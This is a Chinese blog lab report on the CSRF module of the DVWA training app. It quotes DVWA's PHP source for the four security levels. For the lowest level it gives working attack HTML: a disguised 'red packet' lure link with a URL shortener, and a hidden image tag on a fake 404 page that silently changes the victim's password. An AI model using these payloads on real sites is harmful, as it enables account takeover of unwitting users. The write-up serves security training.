DVWA 实验报告:3、跨站请求伪造 CSRF

最新推荐文章于 2023-05-12 17:03:16 发布
最新推荐文章于 2023-05-12 17:03:16 发布
阅读量1.6k 收藏 8
点赞数 2
分类专栏: # dvwa 专栏 文章标签: CSRF dvwa 跨站请求伪造 php代码审计 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21516633/article/details/105501892
版权

文章更新于:2020-05-14
注1:环境搭建参见:搭建DVWA Web渗透测试靶场
注2:实验报告2参见:DVWA 实验报告:2、命令注入
注3:本文部分参考:新手指南:DVWA-1.9全级别教程之CSRF

DVWA之跨站请求伪造漏洞 CSRF

一、前言

CSRF 是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作。
产生原因是:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。

二、安全级别:LOW

2.1、源码


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

2.2、攻击

我们只需在自己的网页上放置一个指向更改密码的链接,然后诱骗用户点击。
如果用户的身份还在有效期,就会更改成功。

<!Doctype html>
<html>
    <head>
        <title>CSRF测试</title>
        <meta charset='utf-8'>
    </head>
    <body>
        <a href="http://home.cc/dvwa/vulnerabilities/csrf/?password_new=admin666&password_conf=admin666&Change=Change#">点我领取红包</a>
        <a href="http://suo.im/6f1cvI">点我也能领取红包</a>
    </body>
</html>

上面的链接中,第一个链接是原始的改密码链接。
但这样当用户鼠标移到超链接上的时候太明显就是更改他密码的,
为了提高成功率,
我们可以将网址缩短。
注:上面的 home.cc 是我在 host 文件里面添加了与 IP 对应关系。
在这里插入图片描述这里选择的是第三个,
将网址输入之后,点击一键缩短即可。
在这里插入图片描述
我们上面的 HTML 代码制作的网页是这样子的:
在这里插入图片描述点击之后是这样的:
在这里插入图片描述但是,问题也来了。
改完密码直接跳转,
傻子都知道他的密码被改了。
那么有没有神不知鬼不觉的方法?
有:我们将上面的代码稍微改一下

<!Doctype html>
<html>
    <head>
        <title>CSRF测试</title>
        <meta charset='utf-8'>
    </head>
    <body>
        <img src="http://home.cc/dvwa/vulnerabilities/csrf/?password_new=admin888&password_conf=admin888&Change=Change#" style="display:none;"/>
        <h1>404 not found</h1>
    </body>
</html>

访问的时候只会显示一个 404 not found 的页面。
在这里插入图片描述

三、安全级别:Medium


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

3.2、攻击

当我们尝试用上述方法攻击的时候,显示:
在这里插入图片描述
这是因为程序检查了改密码请求的来源,
如果不是来自本站则不信任。
这导致我们的链接失效。

所以我们需要伪造referer,
至于怎么伪造,
我还没学会~
我设置了好几次html都带不上referer。
求指教。

四、安全级别:High

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

High 等级随机生成了一个token
需要动态获取才能绕过。

五、安全级别:Impossible


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

当需要原密码才能修改密码的时候,
就不能用跨站绕过了。

六、总结

七、Enjoy

我不是高材生
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试之CSRF跨站请求伪造
weixin_45380284的博客
03-06 521
CSRF跨站请求伪造 理论: 1.定义: csrf跨站请求伪造,是一种对网站的恶意利用,与xss跨站脚本攻击的区别是 xss是利用站内的信用用户进行攻击,但是csrf是通过获取受信任用户的请求,使攻击者伪造自己成为信任用户,进而发起攻击。 XSS: 是由于输入检测不严格 注入js代码 csrf: 网站的恶意利用 伪造用户请求 2.工作原理: 1.用户浏览并登录了信任网站A 2.此时验证通过,就会在用户处产生受信任网站A的cookie 3.接着用户在没有登录网站A的情况下,访问了威胁网站B 4.此时威胁网站B
DVWA 实验报告:8、SQL 注入 SQL Injection(Blind)
看那白熊
05-30 717
占位
CSRF漏洞实验报告
cxrpty的博客
02-25 1894
实验环境:DVWA、Apache 实验原理: CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为 实验内容: 实验一:修改密码(低级别DVWA) 1.构造一个网址:http://192.168.1.101/1.html ht...
DVWA跨站请求伪造CSRF攻击全面分析
abraham76的博客
10-01 3320
1、CSRF简介    CSRF全称是Cross Site Request Forgery,跨站请求伪造。简单理解就是利用客户身份伪造请求,以达到指定目的。    具体场景就是:假设A登陆了某游戏网站Game,那么Game网站就会返回一个cookie来记录用户身份,以后每次请求都会自动携带该cookie与Game服务器交互。然后攻击者B精心构造了一个链接或者网页,诱使用户点击,这时就会向Game服务器发送一个请求,而该请求是携带了cookie值的,服务器就会处理该请求。B的目的就达到了。    CSRF攻击
DVWA-CSRF(跨站请求伪造)
qq_45751902的博客
04-25 2470
目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(跨站请求伪造)简介 概念 CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
DVWA通过教程之跨站请求伪造CSRF
→_→
09-16 340
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 更多原理请参考:浅谈“跨站请求伪造CSRF)”-干货满满 测试CSRF,要求能够不通过该页面即可修改用户登录密
DVWA通关攻略之跨站请求伪造
勿山几已
05-12 519
介绍CSRF攻击并简单演示攻击过程。
DVWA学习记录系列(四)SCRF 跨站伪造请求模块
qq_43696276的博客
10-17 675
提示:本文主要针对于SCRF 跨站伪造请求全等级的分析以及相应的破解。 文章目录前言一、CSRF是什么?二、使用步骤1.引入库2.读入数据总结 前言 本次主要针对于DVWA当中的跨站伪造请求模块进行学习。主要进行的是dvwa的low、medium、high级别进行破解,由于impossible模块难度过高所以都将不进行impossible的实验。本次CSRF的high级别将会放至之后的存储xss漏洞中进行讲解。 一、CSRF是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数
CSRF漏洞(原理、DVWA实验、修复建议)
coderge's CSDN Blog.
09-20 2721
目录 1 介绍CSRF漏洞 2 CSRF漏洞的原理 3 DVWA CSRF实验过程 3.1 low级别 3.2 medium级别 相关函数说明 3.3 high级别 3.4 impossible级别 4 CSRF漏洞修复建议 1 介绍CSRF漏洞 CSRF (Cross -site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)
跨站攻击(XSS+CSRF).docx
最新发布
01-05
5. 撰写实验报告,注重规范性、逻辑性和表达清晰度。 实验过程中,学生将使用Burp Suite等工具进行HTTP请求的抓包和篡改,以模拟攻击过程,同时也会学习如何修复这些漏洞,提高Web应用的安全性。 总结来说,XSS和...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
web安全技术-实验七、跨站脚本攻击(xss)(反射型).doc
08-20
跨站脚本攻击(XSS)概述】 XSS,全称Cross Site Scripting,是一种常见的Web应用程序安全漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
pikachu,dvwacsrf详细步骤
05-17
1. CSRF跨站请求伪造):CSRF是一种网络攻击方式,攻击者通过构造恶意请求,利用受害者在目标网站上的已登录身份执行非预期的操作。在这个例子中,Pikachu和DVWA(Damn Vulnerable Web Application)是用于教学...
《计算机网络安全实验》实验报告1
11-01
【计算机网络安全实验】实验报告1主要探讨了DVWA(Damn Vulnerable Web Application)中的PHP与MySQL环境下的SQL注入漏洞。该实验旨在让学生理解和掌握SQL注入的原理、利用方法以及防御措施。以下是实验涉及的主要...
搭建DVWA Web渗透测试靶场
热门推荐
看那白熊
01-31 1万+
搭建DVWA Web渗透测试靶场,进行Web安全测试练习
DVWA 实验报告:1、暴力破解
看那白熊
04-14 5406
文章更新于:2020-04-14 注1:环境搭建参见:搭建DVWA Web渗透测试靶场 注2:实验报告2参见:DVWA 实验报告:2、命令注入 DVWA之暴力破解漏洞一、前言二、安全级别:LOW2.1、查看源码2.2、尝试暴力破解三、安全级别:Medium3.1、查看源码3.2、攻击思路四、安全级别:High4.1、查看源码4.2、攻击思路五、安全级别:Impossible5.1、查看源码5.2、...
DVWA 实验报告:2、命令注入
看那白熊
04-11 2705
本节主要讲解 DVWA_v1.9 中的命令注入部分。 覆盖全部四种安全级别,从源码分析的角度上进行攻击测试。 适合新手小白。
DVWA 实验报告:5、文件上传 File Upload
看那白熊
05-16 1535
dvwa 文件上传漏洞复现
dvwa跨站请求伪造 (csrf)
09-13
跨站请求伪造CSRF)是一种攻击方式,利用用户已经通过身份验证的会话执行非预期的操作。 在DVWA中,CSRF可以被用作一种漏洞进行攻击。攻击者可以通过在受害者浏览器中注入恶意代码或链接,来诱使用户执行某些不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值